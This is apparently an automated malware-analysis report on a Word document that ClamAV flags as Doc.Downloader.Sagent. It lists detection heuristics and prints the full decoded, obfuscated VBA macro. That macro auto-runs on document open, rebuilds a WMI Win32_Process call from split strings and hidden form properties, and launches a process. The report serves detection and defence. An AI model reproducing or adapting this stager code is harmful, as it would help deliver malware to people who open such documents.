Verdict: MALICIOUS
Risk Score: 272
Heuristics: 9

- ClamAV: Doc.Downloader.Sagent-7459479-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-7459479-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive. Matched line in script: `Zikxvsbrurea = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", XXXXX), "") + Wlohmbxf.Nsboizdpzuiyq + "rocess"`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set Llyitqjc = CreateObject(Nzxreyuirwltz)`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set Yzyzsyikgcvl = GetObject(INSN & Zikxvsbrurea)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7873 bytes |

SHA-256: 58085ffc8dda8658cf2976dae71911dfbac4ca186479b529254b09e24e03575f

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 265 of 392 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Wlohmbxf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nsboizdpzuiyq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Errfilzinaklg, Lwhnnpkev
For Lnikmigtx = Pwgpawccpm To Zlwcfitnw
Zlacncem = Agkgxonbtvuu
Zqfbldaput = Hex(Atpzkzyp)
Lwhtglczi = Chr(Qdxxdaprl)
Ytntmuluwqk = Jurwomvlc - Qsbhyixntu
Gnzionjpfjs = Jscyqfwvdc
Ewnsxblmgljp = Hex(Xtiehanxp)
Ocoarckfqkrv = Int(Hhbcxjnuj)
Next
Dim Vgcvdnhgr, Skttvegl
For Bekzffuefogg = Emwoaxjxhesoh To Wgkkmtcs
Inbmotlrwpjis = Mexghqxve
Wwfdctaqs = Hex(Lskgwlkrn)
Capelohkrxdgx = Chr(Tmpicsxete)
Tmlmvtwu = Xhljhskimmr - Xbfmgevvapnn
Kinavgeph = Lfuksjjiunkp
Pjsxsywjlza = Hex(Wenhujtvzb)
Gdedszsgk = Int(Mrpywbtuktxnd)
Next
Dim Chrzelxnnse, Xrbpfoyczynlv
For Aivdkcjnz = Pimplmuit To Xveylcjdoiiqn
Bfuodbnyyppkm = Nkdblzzmrge
Xhszkplonf = Hex(Jwfjwswcxvxml)
Btdhzfabrwpzx = Chr(Zfddbctc)
Itpcjgnrsju = Brivnmgsymuvs - Rtiqhsrml
Qchfghohb = Hgqpvjgugrwf
Becfkexwfwelt = Hex(Gkhvymcaswi)
Srtwhhfdmcr = Int(Katkkpahzgpk)
Next
Llyitqjc
End Sub
Attribute VB_Name = "Easpwgcbwkfj"
Attribute VB_Base = "0{44E853AD-C495-4EDA-A1F7-CAABD72FB8C8}{E0F90029-5277-45CC-9E55-529C6D30D26B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xzzkpmgfgfh"
Function Qxqzlskyh()
Dim Flnmephmida, Rpvipiing
For Kzsipifxru = Yrvfqelhrr To Zzgbvwbzya
Wzwaxdfle = Rudsjufvtegip
Bvsnnxpq = Hex(Hkjoljhwcog)
Setfiaqq = Chr(Tbksqpzcdubbk)
Hvymnnxir = Usgqrazmqn - Rhcmdybquxy
Setlwstsh = Vncbcxftg
Elaukpjpx = Hex(Kzwgatuhy)
Uqpvaowreta = Int(Ikcidjrwnqccf)
Next
Jxcafeormlc = Wlohmbxf.Nsboizdpzuiyq
Dim Tbiwtelusjrac, Hqewtoenpn
For Vrqbvdslyb = Sigbsspnseyyo To Lpntirrqdbhvx
Lfdfekidvwxou = Smaghvkiehas
Kwsduttujqncm = Hex(Kcxakjvvrccax)
Esfdkafkzxzxd = Chr(Ejrltfcssqpa)
Ssvvlmux = Weryckmrm - Sjlfsbamnuzej
Ebrwygajp = Ephdxoddzjj
Kukvnwahrygk = Hex(Arszvqexkfj)
Bggvukxmdv = Int(Sogmrasxzclhj)
Next
Tmiypvnrxz = Jxcafeormlc + Easpwgcbwkfj.Ypjhiucujt + Easpwgcbwkfj.Jrbmjczvhlzqa + Easpwgcbwkfj.Rvbofqebud
Dim Mskfqyfosfgfv, Ycpxqfpzqyi
For Tckykolzqlkwk = Aekkcgebp To Qwtugiuhv
Hugbqirfbguh = Nxbspbubfy
Webcdqrfw = Hex(Apvjjvzw)
Itksogoagpim = Chr(Ndydeqtpxt)
Tskffbak = Rjojceqzvo - Vfxvsybtvq
Nwqakgmayc = Punoyxymyjw
Jjbjuoarbw = Hex(Ppoceltthgx)
Uysfodalra = Int(Qdnmxnxhai)
Next
Nfpcgefp = Tmiypvnrxz + Easpwgcbwkfj.Shbuwtgaarlzq + Easpwgcbwkfj.Qxvpaqknzamz
Dim Hchtgvtdha, Vcobypcoqzuz
For Jiqyfvgsuudym = Lqetqqjwma To Evhihghmknj
Nchtxacf = Jpgwizmdx
Cwmmvsekb = Hex(Iqdocdoai)
Qysbkzmy = Chr(Bukfvhbhyu)
Cgpsuxiox = Agouuifycpuhw - Gwnsjnzkv
Reopupovjz = Hzswyqizsz
Mbeclavsiir = Hex(Mvftbiizjf)
Raunmtrsxds = Int(Jieoezismm)
Next
Qxqzlskyh = Ynmrjwhfd + Nfpcgefp + Ynmrjwhfd
Dim Mfcgcjrab, Ocyborwj
For Smntxaxcbuwy = Wrjkqafjatrzs To Fytvnutpnei
Zleqvzewhmsrn = Tbyhxovvcc
Dcwghhhj = Hex(Besusxmbezl)
Mfbvjdqcnbwbt = Chr(Ljgzyezup)
Yibxurwgjagmy = Modwtylhputmi - Lmsnfibqgef
Efxiuasl = Kymaldbfnpwp
Kzplywrnkjdk = Hex(Rizcttipth)
Fysyfokdxu = Int(Muawncxbg)
Next
End Function
Function Llyitqjc()
Dim Inwlkbrbmtnu, Gwbshyhbxa
For Whnllphoprax = Yvvkpndulzoi To Mgqvlrekob
Nqvowecozlgmk = Cvnwcjwcibe
Oogucrznyxdkg = Hex(Aadlzdcoae)
Rommrsfalel = Chr(Mbdykmwslbiy)
Ulzgqxcizl = Rarzvptrnb - Psjwfmeoyhl
Yvmqdcrnyu = Mgsebxtn
Yogcmhvnkpc = Hex(Ugbkygdqxnutg)
Wjradhwyja = Int(Rlkfyzjyxz)
Next
XXXXX = "qwh_h2bd"
Zikxvsbrurea = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", XXXXX), "") + Wlohmbxf.Nsboizdpzuiyq + "rocess"
Dim Zhfkczzcdlwp, Kfnifhazhh
For Hpgmagnmm = Kltqngwceno To Ttenrzzyi
Kvqlpcezhqdw = Mtlexstsbth
Undqbpbfspkmc = Hex(Popwswefotk)
Suxenckmeacgj = Chr(Earvjecndkjd)
Owqldnysg = Ycknnqjlkbnbp - Pgttezuepelv
Wmusvlbsaquar = Avaqixrym
Dxvjbucn = Hex(Tiuitxgczdh)
Oikexafnhxuhd = Int(Paxdrqhmghp)
Next
Set Yzyzsyikgcvl = GetObject(INSN & Zikxvsbrurea)
Dim Smvwqhazkfu, Osmlsuct
For Ukyopvsz = Axmhpbpm To Mljfwrmdvukwm
Mstkesfz = Qfewreqf
Jbsryjoebqd = Hex(Gdiwckgg)
Dglhhequqersk = Chr(Mudbyxye)
Siinvckwfplmc = Lvnhlnsivqpce - Ebjiovhgvchvf
Zrvbnblxqka = Xfzfigkjdtt
Orfesnwf = Hex(Hdbxtesxouuiq)
Mybgvxbx = Int(Tsmsmehghs)
Next
Gysxeoifvby = Zikxvsbrurea + Easpwgcbwkfj.Ysvawgsy.ControlTipText + Easpwgcbwkfj.Rbizqemqs.ControlTipText
Dim Xvtdherax, Rrjflstfczx
For Ywlzjdcztl = Xalrmsuzli To Fmqzlchzohf
Rruapxgnworh = Hdhaqcxtxmd
Dvupvayvazy = Hex(Najxyrxmaw)
Oivxuhxag = Chr(Bywgougdjdgp)
Zomqedznjg = Xgsbvdki - Ckjstsxdisynu
Kczsoppolx = Iiceocalbh
Hqfxzejlzq = Hex(Kptimwxv)
Pugojlthi = Int(Qkyjrognolr)
Next
Nzxreyuirwltz = Gysxeoifvby + Wlohmbxf.Nsboizdpzuiyq
Dim Cnhovqnice, Rgslmmaufif
For Fzqsktnra = Fyvuhiizluc To Ohsexeuhf
Qxqrlozrfcg = Gmxafqkdmle
Itvgjzog = Hex(Sqoxulhcis)
Lhubpzldmmnkf = Chr(Ysgzkdcfjrsq)
Ivkzkiomh = Uayfcernpik - Quickkwitydq
Vyhmlvkqde = Mbccwytri
Lcwogabupzuwp = Hex(Ygiareddyugqb)
Lbfzvjogdpbjj = Int(Emuazmjiyuiy)
Next
Set Llyitqjc = CreateObject(Nzxreyuirwltz)
Dim Yfxjyixqdjif, Kimwzdtt
For Wmbibkukpf = Brvedplru To Aneatxubf
Nlhposoxpu = Hvauadig
Gbuxkbmvehaqe = Hex(Nbsdwkljkxesd)
Wasqffvqhmkuq = Chr(Qrrxmcpc)
Vrjafjjbgk = Oersklqlqvaig - Fhuhxwdk
Pbdasjzctd = Tremkwarb
Hetlccakudgu = Hex(Lxlbfnjozn)
Kmhkwkvj = Int(Zxwastscmxuzz)
Next
Llyitqjc.XSize = False
Dim Lhnbdiuu, Idlomecd
For Thouuovcdvur = Tueexmth To Rlkqldtne
Dssgomsqbk = Hvraxgjbmvj
Efqzbgnvup = Hex(Xizbqkubuc)
Cwguqwiipxkh = Chr(Adcvmfpozxj)
Kpcobkvweasey = Wayszykryzpp - Xikqaxtmjiw
Vdjqoyvrzzra = Xdplvqih
Oxjzjrpwt = Hex(Ooibrjwyjtp)
Vjtxbplolbcqo = Int(Hjuhsljoh)
Next
Llyitqjc.YSize = False
Dim Eskmwmbm, Plcabymcgfpic
For Aarlbqjzzn = Saktifcl To Ufivwzflwqjaw
Arhfmcmoxt = Mgczpjbfmdgtk
Rwrsdxjinvg = Hex(Hqkbvdtetruqu)
Xlnvrnvsgbyyd = Chr(Eitfxvseygb)
Fwbiqlkchlyim = Awfqfemlx - Begpoqdxmj
Hrnmwxvxkxo = Aletskdt
Gvrwhepmua = Hex(Yrrpobryeqcoo)
Dtywvahhrfbns = Int(Tdtcmncdwb)
Next
Do While Yzyzsyikgcvl.Create(Null & Qxqzlskyh, Iqgoixrvf, Llyitqjc, Uauxwnivonyv)
Loop
Dim Luayzniy, Xthqlpxfrybtx
For Qoxekajpk = Lvtwnlllez To Uauvsvbr
Uiyltxyodx = Dcmvlqhl
Plcdqfrui = Hex(Bbkxbsonqwe)
Xsjwklklyptn = Chr(Htxjoyncbbx)
Tyvikhigyvujw = Clrkschu - Pffuqizbnq
Hifaiixc = Ilzpjnqvmdbv
Clhnuijz = Hex(Eiestyxqnxwuv)
Mksejblnexwbk = Int(Ijwalbiybngl)
Next
End Function